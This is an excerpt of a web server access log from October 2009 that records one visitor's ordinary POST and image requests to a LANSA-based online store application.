70.4.32.212 - - [22/Oct/2009:01:22:38 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4B8979320011E908L+M37+ENG HTTP/1.1" 200 38042 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4080991200F19908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:23:02 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0157AB43839972003A4908L+M37+ENG HTTP/1.1" 200 38044 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4B8979320011E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:23:17 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB43839972003A4908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:23:18 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4984A9A2004F3908L+M37+ENG HTTP/1.1" 200 77211 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB43839972003A4908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
